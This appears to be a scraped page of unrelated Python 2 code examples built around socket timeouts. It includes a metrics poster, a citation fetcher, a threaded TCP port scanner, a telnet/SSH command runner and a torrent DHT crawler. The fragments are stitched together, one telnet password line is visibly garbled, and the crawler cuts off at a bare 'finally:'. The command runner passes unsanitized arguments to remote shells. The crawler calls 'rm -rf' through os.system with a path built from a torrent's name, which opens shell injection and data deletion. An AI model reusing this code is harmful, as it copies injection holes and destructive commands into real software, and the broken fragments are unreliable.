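        # Wrap a method so it runs with self.__timeout as the global default,
        # restoring the previous default afterwards.
        def _f(*args, **kwargs):
            orig_timeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(args[0].__timeout)  # args[0] is self
            try:
                return f(*args, **kwargs)
            finally:
                socket.setdefaulttimeout(orig_timeout)
        return _f

    @_with_timeout
    def connect(self, host, port=80):
        # Any blocking socket call made here sees the instance's timeout.
        return socket.create_connection((host, port))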
def post(ali_uid, metric_name, metric_value, unit, fields):
    # init logger
    logger = logging.getLogger('post')
    logger.setLevel(logging.INFO)
    handler = RotatingFileHandler(filename="/tmp/post.log",
                                  mode='a',
                                  maxBytes=1024 * 1024,
                                  backupCount=3)
    formatter = logging.Formatter(
        fmt='%(asctime)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    logger.addHandler(handler)
    socket.setdefaulttimeout(10)

    # convert dimensions
    kv_array = fields.split(',')
    dimensions = {}
    for kv in kv_array:
        kv_array = kv.split('=')
        #print "dimensions:%s=%s" %(kv_array[0],kv_array[1])
        dimensions[kv_array[0]] = kv_array[1]
    json_str = json.dumps(dimensions)

    #current timestamp
    timestamp = int(time.time() * 1000)

    # concatenate into the metrics payload
    metrics = '[{"metricName": "%s","timestamp": %s,"value": %s, "unit": "%s", "dimensions": %s}]' % (
        metric_name, str(timestamp), str(metric_value), unit, json_str)

    params = {
        "userId": ali_uid,
        "namespace": "acs/custom/%s" % ali_uid,
        "metrics": metrics
    }
    print params
    # sleep a random 0-5 seconds so reports are spread out
    interval = random.randint(0, 5000)
    time.sleep(interval / 1000.0)

    data = urllib.urlencode(params)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close"
    }
    exception = None
    http_client = None
    try:
        http_client = httplib.HTTPConnection(REMOTE_HOST, REMOTE_PORT)
        try:
            http_client.request(method="POST",
                                url=REMOTE_MONITOR_URI,
                                body=data,
                                headers=headers)
            response = http_client.getresponse()
            if response.status == 200:
                print "upload metric succeed!"
                return
            else:
                print "response code %d, content %s " % (response.status,
                                                         response.read())
                logger.warn("response code %d, content %s " %
                            (response.status, response.read()))
        except Exception, e:
            exception = e
    finally:
        if http_client:
            http_client.close()
        if exception:
            logger.error(exception)
Exemple #55
0
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     # create an event to listen for stop requests on
     self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(120)
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#

import re, sys, urllib, urllib2
import socket

socket.setdefaulttimeout(15)

ACS_URL = 'http://pubs.acs.org'

CITATION_FORMATS_URL = ACS_URL + '/action/showCitFormats'
CITATION_DOWNLOAD_URL = ACS_URL + '/action/downloadCitation'

# DOI is in the URL - this is what we need to get citation information
URL_DOI_REGEXP = '(10[.]\d+/[^/?&]+)'
URL_DOI_REGEXP_FLAGS = re.IGNORECASE | re.VERBOSE

# error messages
ERR_STR_PREFIX = 'status\terr\t'
ERR_STR_FETCH = 'Unable to fetch the bibliographic data: '
ERR_STR_TRY_AGAIN = 'The server may be down.  Please try later.'
ERR_STR_NO_DOI = 'Could not extract DOI from the URL: '
import socket
import time
import threading

import Queue

socket.setdefaulttimeout(0.25)
print_lock = threading.Lock()

target = raw_input('Enter the host to be scanned: ')
t_IP = socket.gethostbyname(target)
print('Starting scan on host: ', t_IP)


def portscan(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((t_IP, port))
        with print_lock:
            print(port, 'is open')
        s.close()
    except Exception as e:
        pass


def threader():
    while True:
        worker = q.get()
        portscan(worker)
        q.task_done()
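
# Hypothetical driver (not in the excerpt): the code above references a queue
# `q` and the threader() worker, so the usual pattern would look roughly like:
q = Queue.Queue()

for _ in range(100):                      # 100 daemon worker threads
    t = threading.Thread(target=threader)
    t.setDaemon(True)
    t.start()

for port in range(1, 1025):               # enqueue the ports to probe
    q.put(port)

q.join()                                  # block until every port is handled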
Exemple #58
0
    def _node_refresh_businfo(self, node, api, bad_node=False):
        """
        Retrieve bus info from the node and update nodes and edges as appropriate
        @param node: node name
        @type  node: str
        @param api: XML-RPC proxy
        @type  api: ServerProxy
        @param bad_node: If True, node has connectivity issues and
        should be treated differently
        @type  bad_node: bool
        """
        try:
            logger.debug("businfo: contacting node [%s] for bus info", node)
            
            # unmark bad node, though it stays on the bad list
            if bad_node:
                self._unmark_bad_node(node)            
            # Lower the socket timeout as we cannot abide by slow HTTP timeouts.
            # If a node cannot meet this timeout, it goes on the bad list
            # TODO: override transport instead.
            old_timeout = socket.getdefaulttimeout()
            if bad_node:
                #even stricter timeout for bad_nodes right now
                socket.setdefaulttimeout(0.2)
            else:
                socket.setdefaulttimeout(1.0)
                
            code, msg, bus_info = api.getBusInfo(_ROS_NAME)
            
            socket.setdefaulttimeout(old_timeout)
        except Exception as e:
            # node is (still) bad
            self._mark_bad_node(node, str(e))
            code = -1
            msg = traceback.format_exc()

        updated = False
        if code != 1:
            logger.error("cannot get stats info from node [%s]: %s", node, msg)
        else:
            # [[connectionId1, destinationId1, direction1, transport1, ...]... ]
            for info in bus_info:
                # #3579 bad node, ignore
                if len(info) < 5:
                    continue
                
                connection_id = info[0]
                dest_id       = info[1]
                direction     = info[2]
                transport     = info[3]
                topic         = info[4]
                if len(info) > 5:
                    connected = info[5]
                else:
                    connected = True #backwards compatibility

                if connected and topic.startswith(self.topic_ns):
                    # blindly add as we will be able to catch state change via edges.
                    # this currently means we don't cleanup topics
                    self.nt_nodes.add(topic_node(topic))

                    # update node->topic->node graph edges
                    updated = self.nt_edges.add_edges(node, topic_node(topic), direction) or updated

                    # update node->node graph edges
                    if dest_id.startswith('http://'):
                        #print("FOUND URI", dest_id)
                        dest_name = self.uri_node_map.get(dest_id, None)
                        updated = self.nn_edges.add_edges(node, dest_name, direction, topic) or updated
                else:
                    #TODO: anything to do here?
                    pass
        return updated
Exemple #59
0
 def __issuecommand(self, host, port, typ, pwd, command, arg):
     socket.setdefaulttimeout(30)
     if "%ARG%" in command:
         if self.__is_ipv4(arg) or self.__is_ipv6(arg):  # arg is an IPv4 or IPv6 literal
             command = command.replace("%ARG%", arg)
         elif len(socket.getaddrinfo(arg, None)) > 0 and not self.resolve:
             # Resolve by switch/router
             command = command.replace("%ARG%", arg)
         elif self.resolve:  # Hostname support
             try:
                 arg = random.choice(socket.getaddrinfo(arg, None))[4][0]
                 command = command.replace("%ARG%", arg)
             except:
                 traceback.print_exc()
                 raise ValueError
         else:
             raise AttributeError
     if typ == TELNET:
         try:
             tn = telnetlib.Telnet(host, port, timeout=30)
             if pwd:
                 tn.read_until("Password: "******"\r\n")
             p = ""
             timer = 50  # 5 seconds read timeout
             while timer:
                 if tn.sock_avail():
                     p += tn.read_some()
                     timer += 1
                 else:
                     timer -= 1
                     sleep(0.1)
             prompt = p.splitlines()[-1]  # Last line with prompt
             tn.write(str(command) + "\r\n")  # Sanitize arguments!?
             read_data = tn.read_until(prompt, 10)
             read_data = read_data.splitlines()
             for line in read_data[:]:
                 if prompt in line:
                     read_data.remove(line)
             tn.write("exit\r\n")
             tn.close()
         except socket.timeout:
             read_data = ['Connection Timeout, please try again later']
     elif typ == SSH:
         ssh = paramiko.SSHClient()
         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
         ssh.connect(
             host, port, username=pwd.split(':')[0], password=pwd.split(':')[1])
         stdin, stdout, stderr = ssh.exec_command(
             str(command))  # sanitize arguments!!??
         read_data = stdout.read().splitlines()
         ssh.close()
     pre_return = []
     indexes = [0, len(read_data)]
     for line in read_data:
         if command in line:
             indexes[0] = read_data.index(line) + 1
         elif 'exit' in line:
             indexes[1] = read_data.index(line)
     pre_return = read_data[indexes[0]: indexes[1]]
     return str(os.linesep.join(pre_return)).strip()
Exemple #60
0
class Master(Thread):
    def __init__(self):
        Thread.__init__(self)
        self.setDaemon(True)
        self.queue = Queue(maxsize=1000000)
        self.metadata_queue = Queue(maxsize=1000000)
        self.pool = PooledDB(pymysql,
                             50,
                             host=DB_HOST,
                             user=DB_USER,
                             passwd=DB_PASS,
                             db=DB_NAME,
                             port=3306,
                             charset="utf8mb4")  #50为连接池里的最少连接数
        self.dbconn = self.pool.connection()
        self.dbcurr = self.dbconn.cursor()
        self.dbcurr.execute('SET NAMES utf8mb4')
        #self.dbconn = mdb.connect(DB_HOST, DB_USER, DB_PASS, DB_NAME, charset='utf8')
        #self.dbconn.autocommit(False)
        #self.dbcurr = self.dbconn.cursor()
        #self.dbcurr.execute('SET NAMES utf8')
        self.n_reqs = self.n_valid = self.n_new = 0
        self.n_downloading_lt = self.n_downloading_pt = 0
        self.visited = set()

    def got_torrent(self):
        utcnow = datetime.datetime.utcnow()
        binhash, address, data, dtype, start_time = self.metadata_queue.get()
        if dtype == 'pt':
            self.n_downloading_pt -= 1
        elif dtype == 'lt':
            self.n_downloading_lt -= 1
        if not data:
            return
        self.n_valid += 1

        try:
            info = self.parse_torrent(data)
            if not info:
                return
        except:
            traceback.print_exc()
            return
        info_hash = binhash.encode('hex')
        info['info_hash'] = info_hash

        info['tagged'] = False
        info['classified'] = False
        info['requests'] = 1
        info['last_seen'] = utcnow + datetime.timedelta(hours=8)
        info['source_ip'] = address[0]

        if info.get('files'):
            files = [z for z in info['files'] if not z['path'].startswith('_')]
            if not files:
                files = info['files']
        else:
            files = [{'path': info['name'], 'length': info['length']}]

        files.sort(key=lambda z: z['length'], reverse=True)
        bigfname = files[0]['path']
        info['extension'] = get_extension(bigfname).lower()
        info['category'] = get_category(info['extension'])

        if 'files' in info:
            try:
                self.dbcurr.execute(
                    'INSERT IGNORE INTO search_filelist VALUES(%s, %s)',
                    (info['info_hash'], json.dumps(files)))
            except:
                print self.name, 'insert search_filelist error', sys.exc_info(
                )[1]
            del files

        try:
            #print '\n', 'Saved', info['info_hash'], info['name'], (time.time()-start_time), 's', address[0], geoip.country_name_by_addr(address[0]),
            self.dbcurr.execute(
                'INSERT IGNORE INTO search_hash(info_hash,category,data_hash,name,extension,classified,source_ip,tagged,length,create_time,last_seen,requests,comment,creator) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',
                (info['info_hash'], info['category'], info['data_hash'],
                 info['name'], info['extension'], info['classified'],
                 info['source_ip'], info['tagged'], info['length'],
                 info['create_time'], info['last_seen'], info['requests'],
                 info.get('comment', ''), info.get('creator', '')))
            self.dbcurr.connection.commit()
            self.n_new += 1
            print '\n', (datetime.datetime.utcnow() + datetime.timedelta(
                hours=8)).strftime("%Y-%m-%d %H:%M:%S"
                                   ), info['info_hash'], address[0], 'saved!'
        except:
            print self.name, 'save search_hash error', info
            traceback.print_exc()
            return

    def run(self):
        self.name = threading.currentThread().getName()
        print self.name, 'started'
        while True:
            while self.metadata_queue.qsize() > 0:
                self.got_torrent()
            address, binhash, dtype = self.queue.get()
            if binhash in self.visited:
                continue
            if len(self.visited) > 100000:
                self.visited = set()
            self.visited.add(binhash)

            self.n_reqs += 1
            info_hash = binhash.encode('hex')

            utcnow = datetime.datetime.utcnow()
            date = (utcnow + datetime.timedelta(hours=8))
            date = datetime.datetime(date.year, date.month, date.day,
                                     date.hour, date.minute, date.second)

            # check whether this info_hash already exists
            self.dbcurr.execute(
                'SELECT id FROM search_hash WHERE info_hash=%s', (info_hash, ))
            y = self.dbcurr.fetchone()
            if y:
                self.n_valid += 1
                # update the last-seen time and request count
                self.dbcurr.execute(
                    'UPDATE search_hash SET last_seen=%s, requests=requests+1 WHERE info_hash=%s',
                    (date, info_hash))
            else:
                if dtype == 'pt':
                    t = threading.Thread(target=self.download_metadata,
                                         args=(address, binhash,
                                               self.metadata_queue))
                    t.setDaemon(True)
                    t.start()
                    self.n_downloading_pt += 1
                elif dtype == 'lt':
                    t = threading.Thread(target=self.ltdownload_metadata,
                                         args=(address, binhash,
                                               self.metadata_queue))
                    t.setDaemon(True)
                    t.start()
                    self.n_downloading_lt += 1

            if self.n_reqs >= 1000:
                self.dbcurr.execute(
                    'INSERT INTO search_statusreport(date,new_hashes,total_requests, valid_requests)  VALUES(%s,%s,%s,%s) ON DUPLICATE KEY UPDATE '
                    +
                    'total_requests=total_requests+%s, valid_requests=valid_requests+%s, new_hashes=new_hashes+%s',
                    (date, self.n_new, self.n_reqs, self.n_valid, self.n_reqs,
                     self.n_valid, self.n_new))
                self.dbconn.commit()
                #print '\n', time.ctime(), 'n_reqs', self.n_reqs, 'n_valid', self.n_valid, 'n_new', self.n_new, 'n_queue', self.queue.qsize(),
                #print 'n_d_pt', self.n_downloading_pt, 'n_d_lt', self.n_downloading_lt,
                self.n_reqs = self.n_valid = self.n_new = 0

    def decode(self, s):
        if type(s) is list:
            s = ';'.join(s)
        u = s
        for x in (self.encoding, 'utf8', 'gbk', 'big5'):
            try:
                u = s.decode(x)
                return u
            except:
                pass
        return s.decode(self.encoding, 'ignore')

    def decode_utf8(self, d, i):
        if i + '.utf-8' in d:
            return d[i + '.utf-8'].decode('utf8')
        return self.decode(d[i])

    def parse_torrent(self, data):
        info = {}
        self.encoding = 'utf8'
        try:
            torrent = bdecode(data)
            if not torrent.get('name'):
                return None
        except:
            return None
        try:
            info['create_time'] = datetime.datetime.fromtimestamp(
                float(torrent['creation date'])) + datetime.timedelta(hours=8)
        except:
            info['create_time'] = datetime.datetime.utcnow(
            ) + datetime.timedelta(hours=8)

        if torrent.get('encoding'):
            self.encoding = torrent['encoding']
        if torrent.get('announce'):
            info['announce'] = self.decode_utf8(torrent, 'announce')
        if torrent.get('comment'):
            info['comment'] = self.decode_utf8(torrent, 'comment')[:200]
        if torrent.get('publisher-url'):
            info['publisher-url'] = self.decode_utf8(torrent, 'publisher-url')
        if torrent.get('publisher'):
            info['publisher'] = self.decode_utf8(torrent, 'publisher')
        if torrent.get('created by'):
            info['creator'] = self.decode_utf8(torrent, 'created by')[:15]

        if 'info' in torrent:
            detail = torrent['info']
        else:
            detail = torrent
        info['name'] = self.decode_utf8(detail, 'name')
        if 'files' in detail:
            info['files'] = []
            for x in detail['files']:
                if 'path.utf-8' in x:
                    v = {
                        'path': self.decode('/'.join(x['path.utf-8'])),
                        'length': x['length']
                    }
                else:
                    v = {
                        'path': self.decode('/'.join(x['path'])),
                        'length': x['length']
                    }
                if 'filehash' in x:
                    v['filehash'] = x['filehash'].encode('hex')
                info['files'].append(v)
            info['length'] = sum([x['length'] for x in info['files']])
        else:
            info['length'] = detail['length']
        info['data_hash'] = hashlib.md5(detail['pieces']).hexdigest()
        if 'profiles' in detail:
            info['profiles'] = detail['profiles']
        return info

    threading.stack_size(200 * 1024)
    socket.setdefaulttimeout(30)

    def log_announce(self, binhash, address=None):
        self.queue.put([address, binhash, 'pt'])

    def log_hash(self, binhash, address=None):
        if not lt:
            return
        if self.n_downloading_lt:
            self.queue.put([address, binhash, 'lt'])

    def fetch_torrent(self, session, ih, timeout):
        name = ih.upper()
        url = 'magnet:?xt=urn:btih:%s' % (name, )
        data = ''
        params = {
            'save_path': '/tmp/downloads/',
            'storage_mode': lt.storage_mode_t(2),
            'paused': False,
            'auto_managed': False,
            'duplicate_is_error': True
        }
        try:
            handle = lt.add_magnet_uri(session, url, params)
        except:
            return None
        status = session.status()
        #print 'downloading metadata:', url
        handle.set_sequential_download(1)
        meta = None
        down_time = time.time()
        down_path = None
        for i in xrange(0, timeout):
            if handle.has_metadata():
                info = handle.get_torrent_info()
                down_path = '/tmp/downloads/%s' % info.name()
                #print 'status', 'p', status.num_peers, 'g', status.dht_global_nodes, 'ts', status.dht_torrents, 'u', status.total_upload, 'd', status.total_download
                meta = info.metadata()
                break
            time.sleep(1)
        if down_path and os.path.exists(down_path):
            os.system('rm -rf "%s"' % down_path)
        session.remove_torrent(handle)
        return meta

    def ltdownload_metadata(self, address, binhash, metadata_queue, timeout=40):
        metadata = None
        start_time = time.time()
        try:
            session = lt.session()
            r = random.randrange(10000, 50000)
            session.listen_on(r, r + 10)
            session.add_dht_router('router.bittorrent.com', 6881)
            session.add_dht_router('router.utorrent.com', 6881)
            session.add_dht_router('dht.transmission.com', 6881)
            session.add_dht_router('127.0.0.1', 6881)
            session.start_dht()
            metadata = self.fetch_torrent(session, binhash.encode('hex'), timeout)
            session = None
        except:
            traceback.print_exc()
        finally:
            metadata_queue.put((binhash, address, metadata, 'lt', start_time))

    def download_metadata(self, address, infohash, metadata_queue, timeout=5):
        metadata = None
        start_time = time.time()
        try:
            the_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            the_socket.settimeout(timeout)
            the_socket.connect(address)

            # handshake
            send_handshake(the_socket, infohash)
            packet = the_socket.recv(4096)

            # handshake error
            if not check_handshake(packet, infohash):
                return

            # ext handshake
            send_ext_handshake(the_socket)
            packet = the_socket.recv(4096)

            # get ut_metadata and metadata_size
            ut_metadata, metadata_size = get_ut_metadata(
                packet), get_metadata_size(packet)
            #print 'ut_metadata_size: ', metadata_size

            # request each piece of metadata
            metadata = []
            for piece in range(int(math.ceil(metadata_size / (16.0 * 1024)))):
                request_metadata(the_socket, ut_metadata, piece)
                packet = recvall(the_socket,
                                 timeout)  #the_socket.recv(1024*17) #
                metadata.append(packet[packet.index("ee") + 2:])

            metadata = "".join(metadata)
            #print 'Fetched', bdecode(metadata)["name"], "size: ", len(metadata)

        except socket.timeout:
            pass
        except Exception, e:
            pass  #print e

        finally: